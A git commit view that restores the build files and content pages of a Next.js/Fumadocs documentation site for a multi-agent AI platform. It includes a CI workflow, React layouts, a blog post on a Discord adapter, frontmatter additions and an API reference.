fix: restore build infrastructure deleted by bad PR #59 merge

[Molecule-Platform-Evolvement-Manager]

PR #59 (commit dae42e2) was merged ~2 weeks ago with a bad diff that
deleted all Next.js/Fumadocs build files (package.json, app/, lib/,
source.config.ts, tsconfig.json, etc.) and most MDX content pages.
This broke the Vercel build, taking doc.moleculesai.app offline.

Root cause: the PR branch was likely rebased or reset to a state that
only contained the marketing/ subtree, so the merge diff showed
deletions for every other file.

This commit:
1. Restores all build infrastructure from the last good commit (86fa0e9)
2. Restores 25 deleted MDX content pages (concepts, quickstart, etc.)
3. Adds frontmatter (title) to 55 .md files added post-bad-merge that
   were missing the required YAML frontmatter for Fumadocs
4. Removes duplicate quickstart.mdx (superseded by quickstart.md)
5. Adds CI workflow (.github/workflows/ci.yml) to catch build failures
   on PRs before merge — this would have prevented the outage

Build verified: 99 static pages generated successfully.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
This commit is contained in:
rabbitblood 2026-04-22 14:03:24 -07:00
parent d8aaca8e7b
commit 40bd0cfdde
98 changed files with 11870 additions and 0 deletions

17
.github/workflows/ci.yml vendored Normal file
View File

@ -0,0 +1,17 @@
name: CI
on:
push:
branches: [main]
pull_request:
branches: [main]
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
with:
node-version: 20
cache: npm
- run: npm ci
- run: npm run build

58
.gitignore vendored Normal file
View File

@ -0,0 +1,58 @@
# dependencies
/node_modules
/.pnp
.pnp.*
.yarn/*
!.yarn/patches
!.yarn/plugins
!.yarn/releases
!.yarn/versions
# testing
/coverage
# next.js
/.next/
/out/
# fumadocs generated source
/.source/
# production
/build
# misc
.DS_Store
*.pem
# debug
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.pnpm-debug.log*
# env files
.env*.local
.env
# typescript
*.tsbuildinfo
next-env.d.ts
# IDE
.vscode/
.idea/
# Credentials — added by chore/credentials-gitignore batch
.env.local
.env.*.local
.env.*
!.env.example
!.env.sample
*.key
*.crt
*.p12
*.pfx
.secrets/
.auth-token
.auth_token

7
app/(home)/layout.tsx Normal file
View File

@ -0,0 +1,7 @@
import { HomeLayout } from 'fumadocs-ui/layouts/home';
import type { ReactNode } from 'react';
import { baseOptions } from '@/app/layout.config';
export default function Layout({ children }: { children: ReactNode }) {
return <HomeLayout {...baseOptions}>{children}</HomeLayout>;
}

29
app/(home)/page.tsx Normal file
View File

@ -0,0 +1,29 @@
import Link from 'next/link';
export default function HomePage() {
return (
<main className="flex flex-1 flex-col items-center justify-center px-6 py-24 text-center">
<h1 className="mb-4 text-5xl font-bold tracking-tight sm:text-6xl">
Molecule AI
</h1>
<p className="mb-8 max-w-2xl text-lg text-fd-muted-foreground">
Build and run multi-agent organisations. Templates, plugins, channels,
and the runtime that ties them together documented end to end.
</p>
<div className="flex flex-wrap items-center justify-center gap-3">
<Link
href="/docs"
className="rounded-md bg-fd-primary px-5 py-2.5 text-sm font-medium text-fd-primary-foreground transition-colors hover:opacity-90"
>
Read the docs
</Link>
<Link
href="https://github.com/Molecule-AI/molecule-monorepo"
className="rounded-md border border-fd-border px-5 py-2.5 text-sm font-medium transition-colors hover:bg-fd-muted"
>
View on GitHub
</Link>
</div>
</main>
);
}

10
app/api/search/route.ts Normal file
View File

@ -0,0 +1,10 @@
import { NextResponse } from 'next/server';
// Minimal search endpoint — returns empty results. The fumadocs
// createFromSource/createSearchAPI both crash on v15.8 with "a.map
// is not a function" during static page collection. This stub keeps
// the route alive so the site builds; swap back to the fumadocs
// search API once the upstream fix lands.
export function GET() {
return NextResponse.json([]);
}

View File

@ -0,0 +1,48 @@
import { source } from '@/lib/source';
import {
DocsBody,
DocsDescription,
DocsPage,
DocsTitle,
} from 'fumadocs-ui/page';
import { notFound } from 'next/navigation';
import { getMDXComponents } from '@/mdx-components';
export const dynamic = 'force-static';
export default async function Page(props: {
params: Promise<{ slug?: string[] }>;
}) {
const params = await props.params;
const page = source.getPage(params.slug);
if (!page) notFound();
const MDXContent = page.data.body;
return (
<DocsPage toc={page.data.toc ?? []} full={page.data.full}>
<DocsTitle>{page.data.title}</DocsTitle>
<DocsDescription>{page.data.description}</DocsDescription>
<DocsBody>
<MDXContent components={getMDXComponents()} />
</DocsBody>
</DocsPage>
);
}
export function generateStaticParams() {
return source.generateParams();
}
export async function generateMetadata(props: {
params: Promise<{ slug?: string[] }>;
}) {
const params = await props.params;
const page = source.getPage(params.slug);
if (!page) notFound();
return {
title: page.data.title,
description: page.data.description,
};
}

13
app/docs/layout.tsx Normal file
View File

@ -0,0 +1,13 @@
import { DocsLayout } from 'fumadocs-ui/layouts/docs';
import type { ReactNode } from 'react';
import { baseOptions } from '@/app/layout.config';
import { source } from '@/lib/source';
export default function Layout({ children }: { children: ReactNode }) {
const tree = source.pageTree;
return (
<DocsLayout tree={tree} {...baseOptions}>
{children}
</DocsLayout>
);
}

3
app/global.css Normal file
View File

@ -0,0 +1,3 @@
@import 'tailwindcss';
@import 'fumadocs-ui/css/neutral.css';
@import 'fumadocs-ui/css/preset.css';

7
app/layout.config.tsx Normal file
View File

@ -0,0 +1,7 @@
import type { BaseLayoutProps } from 'fumadocs-ui/layouts/shared';
export const baseOptions: BaseLayoutProps = {
nav: {
title: 'Molecule AI',
},
};

28
app/layout.tsx Normal file
View File

@ -0,0 +1,28 @@
import './global.css';
import { RootProvider } from 'fumadocs-ui/provider/next';
import { Inter } from 'next/font/google';
import type { ReactNode } from 'react';
const inter = Inter({
subsets: ['latin'],
});
export const metadata = {
title: {
default: 'Molecule AI Documentation',
template: '%s | Molecule AI Docs',
},
description:
'Build and run multi-agent organisations on the Molecule AI platform. Templates, plugins, channels, and the runtime that ties them together.',
metadataBase: new URL('https://doc.moleculesai.app'),
};
export default function Layout({ children }: { children: ReactNode }) {
return (
<html lang="en" className={inter.className} suppressHydrationWarning>
<body className="flex flex-col min-h-screen">
<RootProvider>{children}</RootProvider>
</body>
</html>
);
}

View File

@ -0,0 +1,80 @@
---
title: "Your AI Agents, Live in Discord: Discord Adapter Ships on Molecule AI"
description: "Molecule AI's Discord adapter connects AI agent workspaces to Discord servers via slash commands and webhooks — no polling, no bot token management, no separate setup required beyond a webhook URL."
publishedAt: 2026-04-21
tags: [channels, discord, integrations, platform]
---
The same question that comes up every time someone deploys an AI agent team: *can we talk to it from where our team already communicates?*
For many teams, that place is Discord. Not as a notification sink — as a working interface. Teams run standups, triage issues, and coordinate deployments in Discord channels. The idea of switching to a web UI or a separate tool to interact with an agent feels like a step backward.
Molecule AI's Discord adapter makes that unnecessary.
## How the Discord Adapter Works
The adapter connects an AI agent workspace to a Discord channel using two standard Discord features: **Incoming Webhooks** (for outbound messages) and **Discord Interactions** (for inbound slash commands).
**Setup is minimal.** You provide a Discord Incoming Webhook URL — the one that Discord generates when you add a webhook to any channel. That's it. No bot creation in the Developer Portal, no OAuth flow, no Gateway setup. The webhook URL encodes the channel and bot credentials, so a single URL is all the adapter needs to send and receive.
On the inbound side, Discord delivers slash command interactions as signed JSON POSTs to your Interactions endpoint. The adapter parses the interaction, reconstructs the slash command as text (`/ask what's our deployment status`), and passes it to the agent as a standard inbound message.
On the outbound side, the agent's response is sent back to the same Discord channel via the webhook. Messages longer than 2000 characters are automatically split at word boundaries.
## Slash Commands as the Interface
Discord bots in guilds can only read messages they have specific permissions for. The Discord adapter sidesteps this entirely by using **slash commands** as the only inbound interface.
Users invoke the agent by typing a slash command:
```
/ask what's our current deployment status?
/ask any open incidents?
/ask summarize the last 24 hours of test results
```
The command name and options are extracted from the Discord Interactions payload and reconstructed as plain text for the agent. The agent's response goes back to the same channel via the webhook.
This means:
- No message reading permissions required
- No rate limit concerns from polling
- Clean, deliberate interaction model — users invoke the agent explicitly
## How It Fits Into the Agent Hierarchy
A Discord channel connected to a workspace becomes part of the agent hierarchy like any other channel. The Community Manager agent can be the primary interface — it receives the slash command, routes it to the right sub-agent (Security Auditor, QA Engineer, PM), and returns the answer to Discord.
```
Discord server
↓ slash command
Community Manager (Molecule AI workspace)
↓ delegate_task
Security Auditor / QA Engineer / PM
↓ response
Discord channel ← answer
```
The routing is invisible to the Discord user. They see a single response from the Community Manager, with the sub-agent delegation happening entirely within the Molecule AI platform.
## Connecting to Canvas
The Discord adapter is managed from the **Channels** tab in Canvas, alongside Telegram and other social channels. From there you can:
- Connect a Discord channel with a webhook URL
- Set an allowlist of Discord user IDs or roles (optional — empty means allow everyone)
- Send a test message to verify the connection
- View channel status and message counts
The adapter also works via API: `POST /workspaces/:id/channels` with `channel_type: "discord"` and the webhook URL in the config.
## Security Notes
Discord Interactions payloads are verified at the router layer before reaching the adapter — requests without a valid signature are rejected before any parsing occurs.
Webhook URLs contain embedded credentials and are stored masked in the database. Error messages throughout the adapter intentionally do not wrap the full webhook URL to prevent credentials leaking into logs or error responses.
## What's Next
Discord is the third platform adapter, following Telegram. Slack and WhatsApp are next on the roadmap.
If you're already running Molecule AI agents and want to connect a Discord server, the Channels tab in Canvas is where to start. The adapter is live now.

View File

@ -1,3 +1,6 @@
---
title: "Hermes Adapter — Shell Design Spec"
---
# Hermes Adapter — Shell Design Spec
**Perspective:** DevOps Engineer + Backend Engineer

View File

@ -1,3 +1,6 @@
---
title: "Hermes Adapter — Implementation Plan"
---
# Hermes Adapter — Implementation Plan
**Author:** Dev Lead

View File

@ -1,3 +1,6 @@
---
title: "Hermes Agent — Adapter Reconnaissance"
---
# Hermes Agent — Adapter Reconnaissance
Reconnaissance of [NousResearch/hermes-agent](https://github.com/NousResearch/hermes-agent) (v0.8.0, 68,713 ⭐, MIT) for potential Molecule AI adapter integration.

View File

@ -1,3 +1,6 @@
---
title: "MeDo Integration Design — Molecule AI Hackathon (May 20 2026)"
---
# MeDo Integration Design — Molecule AI Hackathon (May 20 2026)
**Status:** Design — implementation pending operator sign-off on open questions (§5).

View File

@ -1,3 +1,6 @@
---
title: "MeDo Smoke Test Log — 2026-04-13 (Run 4)"
---
# MeDo Smoke Test Log — 2026-04-13 (Run 4)
**Tester:** PM (direct execution)

View File

@ -1,3 +1,6 @@
---
title: "ADR-001: Admin endpoints accept any workspace bearer token"
---
# ADR-001: Admin endpoints accept any workspace bearer token
**Status:** Accepted — known risk, Phase-H remediation planned

View File

@ -1,3 +1,6 @@
---
title: "Agent Card"
---
# Agent Card
Every workspace publishes an Agent Card at `/.well-known/agent-card.json`. This is a standard A2A document that describes the workspace's identity, capabilities, and how to communicate with it.

View File

@ -1,3 +1,6 @@
---
title: "Bundle System"
---
# Bundle System
A workspace bundle is the portable unit of the platform. It is a single `.bundle.json` file that captures everything needed to recreate a workspace anywhere.

View File

@ -1,3 +1,6 @@
---
title: "Agent Runtime Adapters"
---
# Agent Runtime Adapters
## Overview

View File

@ -1,3 +1,6 @@
---
title: "Config Format (config.yaml)"
---
# Config Format (config.yaml)
Each workspace type has a `config.yaml` that defines its personality — the model, skills, tools, and settings.

View File

@ -1,3 +1,6 @@
---
title: "Skills"
---
# Skills
A skill is a package that gives an agent knowledge, instructions, and optionally executable tools. Skills are the primary way to customize what a workspace agent can do.

View File

@ -1,3 +1,6 @@
---
title: "Social Channels"
---
# Social Channels
Connect AI agent workspaces to social platforms (Telegram, Slack, Discord) so users can talk to agents from anywhere. Built on a pluggable adapter pattern — one channel per workspace, multiple chats per channel.

View File

@ -1,3 +1,6 @@
---
title: "System Prompt Structure"
---
# System Prompt Structure
When a workspace agent starts (or rebuilds its prompt), the system prompt is assembled in a specific order: **specific to general** — the agent's own identity first, then what it can do, then what it can delegate.

View File

@ -1,3 +1,6 @@
---
title: "Team Expansion (Recursive Workspaces)"
---
# Team Expansion (Recursive Workspaces)
When a workspace is expanded into a team, it gains sub-workspaces while its own agent remains as the **team lead** (coordinator). This is recursive — sub-workspaces can themselves be expanded into teams, infinitely deep.

View File

@ -1,3 +1,6 @@
---
title: "A2A Protocol (Inter-Workspace Communication)"
---
# A2A Protocol (Inter-Workspace Communication)
Workspaces talk to each other **directly** via A2A (Agent-to-Agent protocol) — the platform is not in the message path.

View File

@ -1,3 +1,6 @@
---
title: "Communication Rules"
---
# Communication Rules
The hierarchy IS the topology. There is no manual connection wiring — communication is derived automatically from the parent/child structure.

View File

@ -1,3 +1,6 @@
---
title: "Platform API (Go Backend)"
---
# Platform API (Go Backend)
The Go backend is Molecule AI's control plane. It does not execute agent reasoning itself. It manages the infrastructure and coordination around workspaces.

View File

@ -1,3 +1,6 @@
---
title: "Registry & Heartbeat"
---
# Registry & Heartbeat
Every workspace registers with the platform on startup and sends a heartbeat every 30 seconds. This is how the platform knows which workspaces are alive and where to find them.

View File

@ -1,3 +1,6 @@
---
title: "WebSocket Events"
---
# WebSocket Events
The canvas subscribes to the platform's WebSocket at `/ws` and receives real-time structure events as JSON messages.

View File

@ -0,0 +1,754 @@
---
title: API Reference
description: Complete reference for all Molecule AI Platform HTTP and WebSocket endpoints.
---
# API Reference
The Molecule AI Platform exposes a REST API (default port 8080) for workspace management, agent registry, communication, and administration. All endpoints return JSON unless otherwise noted.
<Callout type="warn">
**Breaking changes — PR #701 (2026-04-17)**
- **`PATCH /workspaces/:id` now requires authentication.** Previously, requests without a bearer token could update cosmetic fields (name, x/y position). All `PATCH` calls now require `Authorization: Bearer <workspace-token>` or receive **401 Unauthorized**.
- **`GET /templates` and `GET /org/templates` now require AdminAuth.** Unauthenticated callers receive **401 Unauthorized**.
- **All `/workspaces/:id` endpoints validate the `:id` path parameter** as a UUID. Non-UUID values return **400 Bad Request** before any database interaction.
**Migration:** add `Authorization: Bearer <workspace-token>` to all `PATCH /workspaces/:id` calls. Use an admin bearer token for `GET /templates` and `GET /org/templates`. Ensure `:id` values in automation scripts are valid UUIDs.
</Callout>
**Base URL:** `http://localhost:8080` (self-hosted) or `https://api.moleculesai.app` (SaaS)
---
## Authentication Model
The platform uses three authentication middleware variants depending on the sensitivity of the route.
### AdminAuth
Strict bearer-token authentication. Required for any route where a forged request could leak prompts/memory, create/mutate workspaces, or leak operational data.
```
Authorization: Bearer <token>
```
**Fail-open behavior:** When no live tokens exist globally (fresh install), AdminAuth passes all requests through. Once the first token is created, all AdminAuth routes require a valid bearer.
### WorkspaceAuth
Per-workspace bearer token binding. Workspace A's token cannot access workspace B's sub-routes. Used for the entire `/workspaces/:id/*` group (except the A2A proxy, which uses `CanCommunicate`).
```
Authorization: Bearer <workspace-token>
```
### CanvasOrBearer
Accepts either a valid bearer token OR a request whose `Origin` header matches `CORS_ORIGINS`. Used only for cosmetic-only routes where a forged request has zero data/security impact.
Currently applies only to `PUT /canvas/viewport`. Do not extend to data-sensitive routes.
---
## Health and Monitoring
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/health` | None | Returns `200 OK` if the platform is running. Use for load balancer health checks. |
| GET | `/metrics` | None | Prometheus text format (v0.0.4) metrics. Scrape-safe, no auth required. |
| GET | `/admin/liveness` | AdminAuth | Per-subsystem `supervised.Snapshot()` ages. Check before debugging stuck scheduler/heartbeat goroutines. |
---
## Workspaces
Core workspace CRUD and lifecycle operations.
### CRUD
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces` | AdminAuth | Create a new workspace. Accepts `name`, `runtime`, `template`, `parent_id`, `tier`, `workspace_dir`, and other fields. Runtime is auto-detected from template config if omitted (defaults to `langgraph`). |
| GET | `/workspaces` | AdminAuth | List all workspaces with status, runtime, agent card, position, and hierarchy info. |
| GET | `/workspaces/:id` | WorkspaceAuth | Get a single workspace by ID. |
| PATCH | `/workspaces/:id` | WorkspaceAuth | Update workspace fields. A workspace bearer token is always required — unauthenticated calls return 401. Validates field constraints: `name` ≤ 255 chars, `role` ≤ 1,000 chars, `model` and `runtime` ≤ 100 chars each; `name` and `role` must not contain newlines (`\\n`, `\\r`) or YAML-special characters (`{}[]|>*&!`). Oversized or invalid field values return 400. `:id` must be a valid UUID. Financial fields (`budget_limit`) are not accepted here — use `PATCH /workspaces/:id/budget` (AdminAuth). |
| DELETE | `/workspaces/:id` | AdminAuth | Delete a workspace. Stops the container, revokes all auth tokens, and removes all associated data. |
### Lifecycle
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/restart` | WorkspaceAuth | Restart the workspace container. Sends a `restart_context` A2A message after successful re-registration. |
| POST | `/workspaces/:id/pause` | WorkspaceAuth | Stop the container and set status to `paused`. Paused workspaces skip health sweep, liveness monitor, and auto-restart. Resume manually via `/resume`. |
| POST | `/workspaces/:id/resume` | WorkspaceAuth | Re-provision a paused workspace. Status transitions to `provisioning`. |
| POST | `/workspaces/:id/hibernate` | WorkspaceAuth | Immediately hibernate a workspace (stop container, set status to `hibernated`). Useful for manual cost control. See hibernation note below. |
<Callout type="info">
**Workspace hibernation**
A workspace with `hibernation_idle_minutes` set in its config will be **automatically hibernated** by the platform after that many idle minutes (no active tasks, no recent heartbeat). The monitor checks every 2 minutes.
`hibernated` differs from `paused`:
- **`paused`** — manual, resumes only via `POST /resume`.
- **`hibernated`** — automatic (or via `POST /hibernate`), resumes **automatically** when an A2A message arrives.
When a message is sent to a hibernated workspace, the platform returns:
```
HTTP 503 Retry-After: 15
{"waking": true}
```
Callers should retry after ~15 seconds. The workspace typically returns to `online` within that window.
To opt a workspace into auto-hibernation, add to its `config.yaml`:
```yaml
hibernation_idle_minutes: 30 # hibernate after 30 min idle; null (default) = disabled
```
**Atomic hibernation guarantee:** The platform uses a single atomic SQL claim (`UPDATE … WHERE active_tasks = 0`) before stopping the container. If a task arrives between the idle check and the container stop, the claim fails and hibernation is aborted — no in-flight tasks are silently lost.
</Callout>
### Budget
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/budget` | AdminAuth | Read a workspace's current spend and ceiling. Returns `budget_limit`, `monthly_spend`, and `budget_remaining` (all in USD cents). |
| PATCH | `/workspaces/:id/budget` | AdminAuth | Set or clear a workspace's monthly spend ceiling. Body: `{ "budget_limit": N }` (positive integer, USD cents) or `{ "budget_limit": null }` to remove the cap. Negative values → 400. Returns same shape as GET. |
**Request / response shape:**
```json
// PATCH request body
{ "budget_limit": 500 } // $5.00/month ceiling
{ "budget_limit": null } // no ceiling
// GET and PATCH success response (200)
{
"budget_limit": 500, // null when no ceiling
"monthly_spend": 312, // accumulated spend this period, USD cents
"budget_remaining": 188 // null when no ceiling; max(0, limit-spend) — can be negative
}
```
<Callout type="warn">
**`budget_limit` and `monthly_spend` are absent from `GET /workspaces/:id`**
Financial fields are stripped unconditionally from the workspace detail
response — they do not appear for any caller, authenticated or not. Always
use `GET /workspaces/:id/budget` (AdminAuth) to read spend data.
`budget_limit` is also **not** accepted on the general `PATCH /workspaces/:id`
endpoint. Use the dedicated `/budget` route.
</Callout>
<Callout type="info">
**Enforcement and fail-open behaviour**
When `monthly_spend >= budget_limit`, `POST /workspaces/:id/a2a` returns:
```
HTTP 402 Payment Required
{"error": "workspace budget limit exceeded"}
```
Channel sends (Slack, Telegram, Discord, Lark) are also budget-gated with
the same 402 response. The workspace itself is **not paused** — it keeps
running; only inbound A2A and channel traffic is blocked.
**Fail-open:** if the budget check encounters a DB error, traffic is allowed
through rather than blocked. The spend ceiling is a soft guardrail, not a
hard guarantee.
</Callout>
---
## Registry
Workspace registration and heartbeat endpoints. Called by workspace runtimes, not by end users.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/registry/register` | None | Register a workspace with the platform. Sets status to `online`. Body includes agent URL, agent card, capabilities. |
| POST | `/registry/heartbeat` | Bearer (if token exists) | Send a heartbeat. Updates Redis TTL key (60s expiry). Body can include `active_tasks`, `current_task`, `error_rate`. Triggers `degraded` status if `error_rate > 0.5`. |
| POST | `/registry/update-card` | Bearer (if token exists) | Update the workspace's agent card (name, description, skills, etc.). |
---
## Discovery
Peer discovery and access control verification.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/registry/discover/:id` | Bearer + `X-Workspace-ID` | Discover a workspace's agent card and URL. Requires caller identification. Fails open on DB hiccup since hierarchy check is primary. |
| GET | `/registry/:id/peers` | Bearer + `X-Workspace-ID` | List all peers (siblings, parent, children) that the caller can communicate with. |
| POST | `/registry/check-access` | None | Check whether two workspaces can communicate. Body: `{ "caller_id": "...", "target_id": "..." }`. Returns `{ "allowed": true/false }`. |
---
## Communication
### A2A Proxy
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/a2a` | CanCommunicate | Proxy an A2A JSON-RPC message to the target workspace. Caller identified via `X-Workspace-ID` header. Canvas requests (no header) bypass access check. On connection error, checks if container is dead and triggers auto-restart. |
### Delegation
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/delegate` | WorkspaceAuth | Async fire-and-forget delegation. Supports idempotency keys. Body includes target workspace, prompt, and metadata. |
| GET | `/workspaces/:id/delegations` | WorkspaceAuth | List delegation status for a workspace. Returns delegation rows with status, result, timestamps. |
---
## Configuration
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/config` | WorkspaceAuth | Get the workspace's `config.yaml` contents. |
| PATCH | `/workspaces/:id/config` | WorkspaceAuth | Update the workspace config. "Save & Restart" writes config and auto-restarts; "Save" writes only and shows a restart banner in the Canvas. |
---
## Secrets
### Per-Workspace Secrets
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/secrets` | WorkspaceAuth | List secret keys for a workspace (keys only, values masked). |
| POST | `/workspaces/:id/secrets` | WorkspaceAuth | Set a secret `{ "key": "...", "value": "..." }`. Auto-restarts the workspace. |
| PUT | `/workspaces/:id/secrets` | WorkspaceAuth | Alias for POST (upsert semantics). Auto-restarts the workspace. |
| DELETE | `/workspaces/:id/secrets/:key` | WorkspaceAuth | Delete a secret by key. Auto-restarts the workspace. |
| GET | `/workspaces/:id/model` | WorkspaceAuth | Return the model configuration derived from available API keys (which provider keys are set). |
### Global Secrets
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/settings/secrets` | AdminAuth | List global secrets (keys only, values masked). |
| PUT | `/settings/secrets` | AdminAuth | Set a global secret `{ "key": "...", "value": "..." }`. Auto-restarts every non-paused/non-removed workspace that does not shadow the key with a workspace-level override. |
| POST | `/settings/secrets` | AdminAuth | Alias for PUT. |
| DELETE | `/settings/secrets/:key` | AdminAuth | Delete a global secret. Same auto-restart fan-out as PUT. |
Legacy aliases `GET/POST/DELETE /admin/secrets[/:key]` also exist and behave identically.
---
## Memory
### Key-Value Memory
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/memory` | WorkspaceAuth | List all key-value memory entries for a workspace. |
| POST | `/workspaces/:id/memory` | WorkspaceAuth | Set a memory entry `{ "key": "...", "value": "..." }`. |
| DELETE | `/workspaces/:id/memory/:key` | WorkspaceAuth | Delete a memory entry by key. |
### Agent Memories (HMA-scoped)
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/memories` | WorkspaceAuth | List or search agent memories. Supports `?q=` for semantic search (see below). |
| POST | `/workspaces/:id/memories` | WorkspaceAuth | Create an agent memory entry. |
| DELETE | `/workspaces/:id/memories/:id` | WorkspaceAuth | Delete an agent memory by ID. |
#### Semantic search (`?q=`)
When a platform-level embedding function is configured, passing `?q=<text>`
on `GET /workspaces/:id/memories` triggers vector similarity search instead of
the default full-text / ILIKE path:
```
GET /workspaces/{id}/memories?q=authentication+flow&limit=10
Authorization: Bearer {token}
```
Matching entries are returned **ordered by cosine similarity** (most similar
first). Each row includes an additional `similarity_score` field (01, higher
is closer):
```json
[
{
"id": "mem_abc123",
"key": "auth-design",
"value": "We use short-lived JWTs issued by the platform and refreshed via /auth/token.",
"similarity_score": 0.91,
"created_at": "2026-04-10T14:22:00Z"
}
]
```
**Graceful fallback**: if no embedding function is configured, or if the
embedding call fails for a given query, the platform falls back transparently
to the text-search path. The `similarity_score` field is absent in fallback
responses. You do not need to change client code to handle both modes.
---
## Files
Workspace file management. Files are stored in the workspace's config directory.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/files` | WorkspaceAuth | List files in the workspace config directory. |
| GET | `/workspaces/:id/files/*path` | WorkspaceAuth | Read a specific file. |
| PUT | `/workspaces/:id/files/*path` | WorkspaceAuth | Write a file. Creates parent directories as needed. |
| DELETE | `/workspaces/:id/files/*path` | WorkspaceAuth | Delete a file. |
| GET | `/workspaces/:id/shared-context` | WorkspaceAuth | Get the shared context files for a workspace (aggregated from parent hierarchy). |
---
## Activity
Activity logging and search for A2A communications, task updates, and agent logs.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/activity` | WorkspaceAuth | List activity logs for a workspace. Supports `?source=canvas` or `?source=agent` filter, and `?type=delegation` for A2A topology overlay polling. |
| POST | `/workspaces/:id/activity` | WorkspaceAuth | Log an activity entry (used by workspace runtimes to self-report). |
| POST | `/workspaces/:id/notify` | WorkspaceAuth | Agent-to-user push message via WebSocket. Delivers a notification to connected Canvas clients. |
---
## Audit Ledger
Tamper-evident audit trail for workspace events. Used by the Canvas Audit Trail panel.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/audit` | WorkspaceAuth | List audit entries for a workspace. Supports `?event_type=delegation\|decision\|gate\|hitl`, `?cursor=<cursor>`, and `?limit=<n>` (default 50). |
### Audit entry schema
| Field | Type | Description |
|-------|------|-------------|
| `id` | string | Unique entry ID |
| `event_type` | string | `delegation`, `decision`, `gate`, or `hitl` |
| `actor` | string | Workspace ID that generated the event |
| `summary` | string | Human-readable event description |
| `chain_valid` | bool | `false` if the entry's hash does not match the prior chain — indicates possible tampering |
| `created_at` | string (ISO 8601) | Event timestamp |
| `cursor` | string \| null | Opaque pagination cursor; `null` when there are no more entries |
Example response:
```json
{
"entries": [
{
"id": "aud_xyz789",
"event_type": "delegation",
"actor": "ws_abc123",
"summary": "Delegated task 'fix CI' to Backend Engineer",
"chain_valid": true,
"created_at": "2026-04-17T14:05:00Z"
}
],
"cursor": "eyJpZCI6ImF1ZF94eXo3ODkifQ"
}
```
### Session Search
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/session-search` | WorkspaceAuth | Search activity logs with filters for type, date range, and text content. Returns paginated results. |
---
## Workflow Checkpoints
Step-level progress persistence for long-running Temporal workflows. Workspaces with `runtime: langgraph` (Temporal) automatically save a checkpoint after each of the three workflow stages (`task_receive`, `llm_call`, `task_complete`) and resume from the last completed stage on restart.
<Callout type="info">
**Automatic resume behavior (runtime: langgraph only)**
When a Temporal workspace restarts mid-workflow, the runtime reads the highest-index checkpoint and sets `resume_from_step` accordingly. Already-completed stages are skipped — the agent picks up exactly where it left off without re-running earlier steps.
Checkpoint I/O is non-fatal: network errors are silently swallowed. A crashed or unreachable platform never prevents the agent from running.
</Callout>
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/checkpoints` | WorkspaceAuth | Upsert a step checkpoint. Body: `{ "workflow_id": "...", "step_name": "task_receive\|llm_call\|task_complete", "step_index": 0, "payload": {...} }`. Uses `ON CONFLICT DO UPDATE` — safe to call multiple times. |
| GET | `/workspaces/:id/checkpoints/:wfid` | WorkspaceAuth | Return all checkpoints for a workflow, ordered by `step_index DESC`. Returns 404 if no checkpoints exist for the workflow. |
| DELETE | `/workspaces/:id/checkpoints/:wfid` | WorkspaceAuth | Clear all checkpoints for a workflow. Called by the runtime on clean task completion. Returns 404 if none exist. |
**Step names and indices:**
| Step | `step_index` | Meaning |
|------|-------------|---------|
| `task_receive` | 0 | Task received from A2A message |
| `llm_call` | 1 | LLM inference completed |
| `task_complete` | 2 | Task result sent back to caller |
---
## Schedules
Cron-based scheduled tasks per workspace.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/schedules` | WorkspaceAuth | List all schedules for a workspace. |
| POST | `/workspaces/:id/schedules` | WorkspaceAuth | Create a schedule. Body: `{ "expression": "0 */6 * * *", "timezone": "UTC", "prompt": "...", "enabled": true }`. |
| PATCH | `/workspaces/:id/schedules/:scheduleId` | WorkspaceAuth | Update a schedule (expression, timezone, prompt, enabled). |
| DELETE | `/workspaces/:id/schedules/:scheduleId` | WorkspaceAuth | Delete a schedule. |
| POST | `/workspaces/:id/schedules/:scheduleId/run` | WorkspaceAuth | Manually trigger a schedule immediately. |
| GET | `/workspaces/:id/schedules/:scheduleId/history` | WorkspaceAuth | List past runs for a schedule. Includes status (`success`, `error`, `skipped`) and `error_detail`. |
Schedule `source` field: `template` for org/import-seeded schedules, `runtime` for Canvas/API-created. The `last_status` includes `skipped` when the scheduler concurrency-aware-skips a busy workspace.
---
## Channels
Social channel integrations (Telegram, Slack, etc.) for workspace agents.
### Per-Workspace Channels
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/channels` | WorkspaceAuth | List channels for a workspace. |
| POST | `/workspaces/:id/channels` | WorkspaceAuth | Create a channel. Body includes platform type, JSONB config, and allowlist. |
| PATCH | `/workspaces/:id/channels/:channelId` | WorkspaceAuth | Update a channel's config or allowlist. |
| DELETE | `/workspaces/:id/channels/:channelId` | WorkspaceAuth | Delete a channel. |
| POST | `/workspaces/:id/channels/:channelId/send` | WorkspaceAuth | Send an outbound message through the channel. |
| POST | `/workspaces/:id/channels/:channelId/test` | WorkspaceAuth | Test the channel connection (send a test message). |
### Global Channel Endpoints
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/channels/adapters` | None | List available social platform adapters (Telegram, Slack, etc.). |
| POST | `/channels/discover` | AdminAuth | Auto-detect available chats/groups for a bot token. |
